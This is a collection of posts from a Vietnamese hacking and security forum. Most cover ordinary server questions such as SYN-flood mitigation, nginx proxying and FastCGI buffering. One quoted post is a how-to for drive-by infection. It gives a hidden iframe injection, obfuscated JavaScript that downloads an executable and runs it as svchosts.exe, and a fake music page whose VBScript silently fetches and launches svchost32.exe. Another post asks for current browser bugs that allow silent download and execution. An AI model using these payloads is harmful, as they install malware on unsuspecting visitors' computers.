|
|
Các mod như recent hay limit mình chưa rõ nó có tác dụng như thế nào đối với kiểu syn flood kết hợp spoof IP.
1. Nếu limit rate thì đối với server thì số lượng packet dành cho mỗi giây đều bị cướp hết. Còn nếu limit rate đối với IP thì liệu nó có hữu hiệu trong khi lượng IP có thể giả mạo tại IPv4 là 4.294.967.296 (2^32) nên thời gian giữa các packet cách nhau rất xa.
2. Phương pháp block IP vĩnh viễn hoặc giới hạn thời gian request của IP dựa trên các mod như recent, ... có khả thi? Ví dụ: website của victim phục vụ cho người Việt Nam (VN) và chắc chắn gần như toàn bộ các IP truy cập sẽ là của VN. Mình syn flood và spoof (giả mạo) IP có range là của VN. Vậy khi block hay limit thì khác nào chặn toàn bộ khách hàng mặc dù server vẫn không bị down.
Hai câu hỏi mình đưa ra dành cho trường hợp server sẽ xử lý như thế nào chứ không phải bão hoà.
|
|
|
Cuối cùng HVA đã "dựng" 1 cái firewall như mình mong đợi
|
|
|
Chào mọi người,
Tính chất cũng như kĩ thuật tấn công đã được nêu rõ, hy vọng biện pháp phòng thủ sẽ là chủ đề kế tiếp thay vì cứ bàn những vấn đề rời rạc khác. Đó mới là mục đích chính và cũng là phần thú vị (nếu RCE thì có thể "up" cái topic của bạn TQN lên tránh lạc đề ).
|
|
|
Monkey.D.Luffy wrote:
Hi, giúp em vấn đề này với.
Em đã setup nginx và chạy thành công nhưng bị lỗi này.
File config em như sau:
-nginx listen ở port 80
-apache listen ở port 8000
-forum em chạy vbb
Em vẫn chạy forum được với path http://site/forum/index.php nhưng có những script ví dụ như login, newpost nó lại bị wwwect về http://site:8000/forum/xxx.php? thế là ko thể connect được, muốn connect thì phải bỏ :8000 ở path, em muốn hỏi là làm sao để khắc phục tình trạng này?
Thân.
Bạn có thể giải thích rõ chổ này giúp mình được không?
|
|
|
Câu trả lời cho vấn đề này là add ResponseBufferLimit=0 vào file config của FCGI
Cảm ơn mọi người đã quan tâm nhé.
|
|
|
nbthanh wrote:
LlyKil wrote:
Thực ra vấn đề này hơi khó giải thích vì đây chỉ là chi tiết nhỏ trong cách "trả lời" request. Cụ thể thì mình đã mô tả như trên.
Tuy không ảnh hưởng gì đến quá trình xử lý hay trả kết quả từ webserver về nhưng mình cũng muốn tìm hiểu.
Mình chỉ thắc mắc là vì sao nếu chuyển sang CGI hay ISAPI thì không như vậy. Có lẽ đây là đặc tính/kiểu riêng của FCGI.
Cảm ơn conmale đã reply cho thread này.
Lý do nó là vì server không hơi đâu mà trả về client từng byte data mà nó phải có 1 buffer để lưu lại output từ script, khi đầy buffer nó trả về 1 lần luôn thì hiệu xuất sẽ tốt hơn nhiều so với việc cứ có byte nào thì trả về byte đó.
Thông thường thì với CGI, server nó giao lại hết execution cho CGI nên gần như CGI script có data gì là server nó trả lại cho client ngay nên bạn thấy data nó ra từ từ. ISAPI thì tôi không rõ lắm, nhưng FCGI thì mặc định nó đã có cái output buffer rồi nên nó sẽ không trả về client từ byte đâu mà đợi đầy buffer (hoặc script kết thúc) nó mới trả về luôn 1 lần.
Mà nhìn qua thì có vẻ như server của bạn là Win, chạy IIS? Nếu không có nhu cầu chạy ASP/.NET mà chỉ chạy PHP thôi thì sao không sử dụng Apache?
Trước tiên mình cảm ơn bạn đã giải đáp giúp thắc mắc.
*Ở trên mình đã nói mình sử dụng server Win và chạy Plesk (Plesk sử dụng IIS).
Vì mình đã lỡ install Plesk nên giờ lại lười unsinstall để làm lại.
Thế còn FCGI mình có thể set buffer để nó trả kết quả xử lý về từ từ được chứ?
|
|
|
Thực ra vấn đề này hơi khó giải thích vì đây chỉ là chi tiết nhỏ trong cách "trả lời" request. Cụ thể thì mình đã mô tả như trên.
Tuy không ảnh hưởng gì đến quá trình xử lý hay trả kết quả từ webserver về nhưng mình cũng muốn tìm hiểu.
Mình chỉ thắc mắc là vì sao nếu chuyển sang CGI hay ISAPI thì không như vậy. Có lẽ đây là đặc tính/kiểu riêng của FCGI.
Cảm ơn conmale đã reply cho thread này.
|
|
|
[Types]
php:26333=Plesk_php5
php5:26333=Plesk_php5
phtml:26333=Plesk_php5
[Plesk_php5]
ExePath=C:\Parallels\Plesk\Additional\PleskPHP5\php-cgi.exe
Đây là cấu hình của FCGI.
|
|
|
Bởi vì nếu mình chuyển qua CGI hay ISAPI thì nó hoạt động đúng như mình nói. Để mình minh hoạ. Ví dụ ta có 1 đoạn code sau
for ($i = 1; $i <= 10; $i++) {
echo $i;
sleep(1);
}
Nếu mình chuyển sang CGI/ISAPI thì cách trả kết quả của nó như sau:
Sau 1s: 1
Sau 2s: 12
Sau 3s: 123
...
Sau 10s: 12345678910
Nhưng nếu mình lại chuyển sang FCGI thì cách trả kết quả của nó:
Sau 1s, 2s, 3s, ... 9s: (không có gì)
Sau 10s: 12345678910
|
|
|
Ví dụ đơn giản thế này, khi mình cho 1 vòng lặp echo 'abc'; khoảng 1000 lần. Khi chạy từ browser http://abc.com/abc.php chẳng hạn. Nó xử lý và trả kết quả về 1 lượt chứ không hiện kết quả theo từng lượt cho đên hết.
|
|
|
Chào mọi người.
Mình đang tối ưu cho webserver sử dụng Windows Server 2003 và chạy Plesk.
Webserver hỗ trợ CGI, FastCGI và ISAP. Theo mình thấy:
- CGI thì web load rất chậm vì CGI chiếm nhiều tài nguyên
- ISAPI quá tuyệt, nhanh nhưng lâu lâu nó phát sinh "PHP has encountered an Access Violation at 7D611952" và lỗi này mình thử search google mà vẫn chưa thấy giải pháp cho nó
- FastCGI cũng nhanh không kém nhưng khi request đến server, data nó phản hồi về không phải chia ra nhiều đợt mà phải xử lý hết tất cả sau đó nó mới trả về 1 lần.
Bây giờ nếu muốn nhanh thì mình phải chọn ISAPI hoặc FCGI nhưng ISAPI thì xuất hiện cái lỗi kia.
Giờ chỉ còn FCGI là mình thấy ổn nhất nhưng kiểu phản hồi lại data khi mình request nó không chia ra nhiều đợt. Vậy làm sao để FCGI có thể chia ra nhiều đợt như CGI hay ISAPI.
Cảm ơn mọi người.
|
|
|
Hầu hết các loại virus hay trojan thì thường là mục đích để quảng cáo hay là thường là "sản phẩm" của script kiddie cho nên ít khi phá hoại dữ liệu như các loại virus của nước ngoài. Vì thế cũng không có gì đáng lo đâu nên bạn yên tâm
|
|
|
Cho LlyKil hỏi cái này tí. Ai biết thì vui lòng trả lời giúp nhá. Thank
Hiện giờ có bug nào của FireFox hay IE mà khi vào web thì tự động down ngầm 1 file hoặc là tự down ngầm rồi chạy luôn ngoài script bug của IE 5.0 trở xuống (cái đoạn VBScript) không ? Nghĩa là bug của FireFox hoặc là Bug của IE 6.0 chẳng hạn (nếu là 5.0 thì xin đừng post )
|
|
|
lion_king_lovely_1985 wrote:
Cách 1:
Sử dụng phương thức IFrame chèn vào site tự rect link tới 1 site có chèn code tự động download virus:
<iframe src=http://www.webcuaban.com/pagecovirus.htm width=0 height=0></iframe>
Hoặc là một thẻ meta cho phép wwwect đến một site khác. Các site link vào tất cả đều là link virus. Tại thời điểm đó còn rất nhiều trình duyệt bị lỗi và chưa kịp update, ngay cả Firefox cũng dính. Khi người dùng internet vào các trang web đã bị thêm dòng như trên thì nó sẽ tự động download virus về máy mà không hề hay biết hoặc nó sẽ hiện ra 1 cái của sổ và bạn cứ thế bấm vào nút đồng ý. Vậy là máy tính bị dính virus.
Ví dụ cái link trên có đoạn code download con virus :
Code:
function Go(a) {
var s = myCreateOB(a, "WS"+"cr"+"ipt.S"+"he"+"ll");
var o = myCreateOB(a, "AD"+"OD"+"B.St"+"ream");
var e = s.Environment("Process");
var xml = null;
var url = 'http://www.webcuaban.com/Virus.exe';
var bin = e.Item("TEMP") + "svchosts.exe";
var dat;
try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Mic"+"ros"+"of"+"t.XM"+"LHTTP"); }
catch(e) {
xml = new ActiveXObject("MSX"+"ML2.Ser"+"verXM"+"LHT"+"TP");
}
}
if (! xml) return(0);
xml.open("GET", url, false)
xml.send(null);
dat = xml.responseBody;
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(dat);
o.SaveToFile(bin, 2);
s.Run(bin,0);
}
Con virus có link url = 'http://www.webcuaban.com/Virus.exe'; sẽ được lưu xuống máy nạn nhân với tên svchosts.exe
Các con virus này thậm trí có khả năng lây qua USB, nên nó nhân bản ra khá nhanh.
Cách 2:
Gần đây có nhiều con virus viết bằng autoIT3 như là:
http://www.webcuaban.com/YMBEST/
http://viet8x.evonet.ro
Download tại đây : http://www.autoitscript.com/autoit3/
(Không khuyến cáo các bạn dùng thử). Tuy nhiên sài được thì rất Kool, có thể giả lập các phím bấm, các nút truột thậm trí giao diện không thua gì soft code bằng các language như C, C++, C#.......
Code:
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="description" content="Audition">
<title>Nghe nhạc Audition | Hyo Ri Lee - 10 Minutes!</title>
</head>
<body bgcolor=black>
<script language="VBScript">
on error resume next
dl = "http://www.webcuaban.com/guitangban.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="svchost32.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
<div align = center>
<h2><font color=#FFFFFF>Các bạn đang nghe bài Hyo Ri Lee - 10 Minutes</font></h2>
<embed src="http://ladymoonlight.org/Hyo Ri Lee - 10 Minutes.mp3" autostart="true" >
</div>
<!-- Start of StatCounter Code -->
<script type="text/javascript" language="javascript">
var sc_project=1874708;
var sc_invisible=1;
var sc_partition=17;
var sc_security="ae164a82";
var sc_remove_link=1;
</script>
<script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/counter.js"></script><noscript><img src="http://c18.statcounter.com/counter.php?sc_project=1874708&java=0&security=ae164a82&invisible=1" alt="unique visitor counter" border="0"> </noscript>
<!-- End of StatCounter Code -->
</body>
</html>
© by: LKL!!!
Không khuyến khích sử dụng với mục đích ko lành mạnh!
Không chịu trách nhiệm dưới mọi hình thức áp dụng!!!
Thân LKL!!!
Xin lỗi BQT nếu thấy bài này có vấn đề ko hay cho định hướng của HVA thì làm ơn Move To Trash giúp LKL!!!
Thân mến!!!
Sao cái cách 1 xài không đc, đã test với IE 6 và FF 2.6. Khi chạy thì nó ra nguyên code luôn. Hay là bỏ vào thẻ nào nữa ?
|
|
|
mR.Bi wrote:
Riêng tôi thấy cách chống DDoS của HVA thì thực sự có hiệu quả và có thể cho tôi biết làm như thế nào ?
Mình thì ko có kiến thức để bàn vấn đề của bạn trên kia , nhưng thú thật đọc câu này mình rất ư là buồn cười DOS thì đâu cần phải có user và password thì phải
DOS mà cứ ngồi đánh F5, enter với click thì kẻ tấn công phải rảnh lắm đây!
Chắc bạn chưa biết về XFlash DDoS rồi
|
|
|
Qua 1 thời gian để nghiên cứu và tìm tòi cách chống DDoS nào là hiệu quả nhất. Với kiến thức khá hạn hẹp của mình thì tôi cũng không dám khẳng định chắc, vì thế có gì sai sót mong bỏ qua.
Về FireWall của DnP thì mỗi lần vào web nó sẽ hiện FireWall bắt click vào mới đc vào. Nhưng những lần sau thì vô ích vì sau khi vượt qua FW thì khi tôi F5 nó không hiện FW lần nữa
Về đặt User + Pass thì cũng không khá hơn vì cách đơn giản để vô hiệu hóa nó là đăng nhập vào web cần DDoS, gõ User + pass rồi với vào trang XFlash DDoS. Hoặc là ấn Remeber để nếu nó đòi pass thì Enter vài lần là nó hết đòi
Còn .htaccess thì chỉ hạn chế đc Flood chứ chống DDoS bằng XFlash thì không được hiệu quả cho lắm
Và loại đặt dấu "&" trước thư mục cần bảo về thì cũng vô ích vì nó không bảo vệ được trang Index mà chỉ bảo vệ đc các file
......
Riêng tôi thấy cách chống DDoS của HVA thì thực sự có hiệu quả và có thể cho tôi biết làm như thế nào ?
|
|